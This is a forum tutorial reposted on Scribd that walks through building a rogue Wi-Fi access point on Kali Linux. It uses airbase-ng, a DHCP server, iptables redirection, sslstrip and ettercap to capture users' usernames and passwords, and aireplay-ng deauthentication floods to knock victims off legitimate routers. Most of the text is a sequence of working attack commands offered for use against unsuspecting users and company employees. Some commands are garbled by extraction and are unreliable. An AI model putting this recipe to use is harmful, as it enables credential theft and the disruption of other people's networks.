Scribd Logo
Importer

Bienvenue sur Scribd !

  • PT Kaly

    Transféré par

    Salladin
    9 vues4 pages
    bvnbvnv

    Titre original

    Pt Kaly

    Copyright

    © © All Rights Reserved

    Formats disponibles

    TXT, PDF, TXT ou lisez en ligne sur Scribd

    Avez-vous trouvé ce document utile ?

    Ce contenu est-il inapproprié ?

    Signaler ce document
    bvnbvnv

    Droits d'auteur :

    © All Rights Reserved
    Téléchargez comme TXT, PDF, TXT ou lisez en ligne sur Scribd
    Signaler comme contenu inapproprié
    9 vues4 pages

    PT Kaly

    Transféré par

    Salladin
    bvnbvnv

    Droits d'auteur :

    © All Rights Reserved
    Téléchargez comme TXT, PDF, TXT ou lisez en ligne sur Scribd
    Signaler comme contenu inapproprié
    sur 4

    Manually Creating a Fake AP to Capture Logins

    on: August 19, 2015, 04:55:23 pm


    Note: Yes, I do realize some sites are utilizing TLS, so we'll not be able to ca
    pture the logins of those sites unfortunately as the encryption mechanism will n
    ot be decrypted. (if you know a way to strip the encryption, please tell me!)
    > Explanation of Attack:
    We'll be setting up a fake access point where we'll be stripping the encryption
    of sites using HTTPS to HTTP so we can grab the inputs of the username and passw
    ord fields. We'll also be sending deauthentication packets to all other routers
    nearby rendering them useless and forcing the user to log into our malicious acc
    ess point. This can easily be used for attacks known as"waterhole attacks" where
    you attack a company where the employees don't even notice they are on an malic
    ious AP because it automatically connected to the malicious one due to the other
    ones being shutdown.
    > Requirements and Lab:
    Kali Linux
    A network adapter that supports packet injection, monitor mode and master mode.
    Exposure to the Linux environment and a decent amount of wireless penetration ex
    perience.
    A functional brain that can process information.
    > Get our default gateway:
    You may do this by typing:
    Code: [Select]
    route -n
    Under where it says "Gateway", you'll need to memorize it or write it down as we
    'll need to use it when we set our IP tables up later on.
    > Now let's install DHCP3-server
    Firstly, if you haven't done so already, type:
    Code: [Select]
    apt-get dist-upgrade
    When that is done, now let's install DHCP server by typing:
    Code: [Select]
    apt-get install dhcp3-server
    Now when it's done installing, we need to configure the DHCP server by typing:
    Code: [Select]
    nano /etc/dhcpd.conf
    Now, copy and paste the following in:
    Code: [Select]
    Authoritative;
    Default-lease-time 600;
    Max-lease-time 7200;
    Subnet 192.168.1.0 netmask 255.255.255.0 {

    Option routers 192.168.1.1;


    Option subnet-mask 255.255.255.0;
    Option domain-name freewifi ;
    Option domain-name-servers 192.168.1.1;
    Range 192.168.1.2 192.168.1.40;
    }
    The only thing you'll need to understand here is the Option domain-name line, wh
    ere it says "freewifi", you may change that to whatever you want to call your fa
    ke (and malicious) access point. For this tutorial, I'll just keep it as freewif
    i.
    Now, just save that by typing CTRL + X and then Y then enter.
    > Now let's begin monitor mode
    To begin monitor mode, type:
    Code: [Select]
    airmon-ng start <wireless interface>
    Then to attempt to prevent any issues, type:
    Code: [Select]
    airmon-ng check kill
    > Begin the fake access point
    Now that you have monitor mode all set up, now let's begin the fake access point
    :
    Code: [Select]
    airbase-ng -c 11 -e <fake AP name> <monitor mode>
    Now you have began the fake AP, however, if you attempt to access it, you won't
    be able to. Remember to not close that terminal as you need it to be online.
    > Now
    There
    is is
    Code:

    let's set up the IP table rules


    are a lot of commands here, so I suggest setting up a shell script, and th
    how you do it, first type:
    [Select]

    nano iptables.sh
    Now assuming you have basic knowledge of networking, I assume you'll read over t
    his and manually configure some of it as some of it might not work for you.
    Code: [Select]
    #!/bin/sh
    clear
    ifconfig at0 192.168.1.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables t nat A PREROUTNG p udp j DNAT to <GATEWAY IP HERE>
    iptables P FORWARD ACCEPT
    iptables --append FORWARD -in-interface at0 j ACCEPT
    iptables --table nat -append POSTROUTING --out-interface eth0 j MASQUERADE

    iptables

    t nat

    A PREROUTING

    p tcp destination-port 80

    j REDIRECT

    to-port 10000

    Then give it permissions by typing:


    Code: [Select]
    chmod +x iptables.sh
    Then just run it by typing:
    Code: [Select]
    ./iptables.sh
    > Starting the DHCP server
    To do this, simply type in:
    Code: [Select]
    dhcpd cf /etc/dhcpd.conf

    pf /var/run/dhcpd.pid at0

    Then to start it, type:


    Code: [Select]
    /etc/init.d/isc-dhcp-server start
    > Starting SSLSTRIP and Ettercap
    I assume you know what both of these tools are doing, so let's start of by start
    ing SSLSTRIP:
    Code: [Select]
    sslstrip f

    p k 10000

    Leave that terminal open. Then to begin ettercap, type:


    Code: [Select]
    ettercap p

    u T

    q I at0

    > Sending Deauth packets to all other routers


    Firstly, begin scanning for the routers by typing:
    Code: [Select]
    airodump-ng <monitor mode>
    Then, select your target and write down their channel number(s) and BSSID(s). Th
    en set the channels by typing:
    Code: [Select]
    iwconfig <monitor mode> channel <Ch. Number>
    Now, to begin the deauthentication attack, type the following command:
    Code: [Select]
    aireplay-ng -0 5000 -a <BSSID> <monitor mode> --ignore-negative-one

    Now just sit back and wait for the users to log in and gather their data.

    Vous aimerez peut-être aussi